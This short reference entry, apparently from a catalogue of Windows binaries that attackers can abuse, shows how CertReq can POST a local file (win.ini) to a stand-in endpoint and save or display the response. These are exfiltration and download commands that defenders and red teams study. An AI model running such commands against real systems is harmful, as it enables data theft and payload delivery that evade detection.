Used for requesting and managing certificates
Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal
CertReq -Post -config https://example.org/ c:\windows\win.ini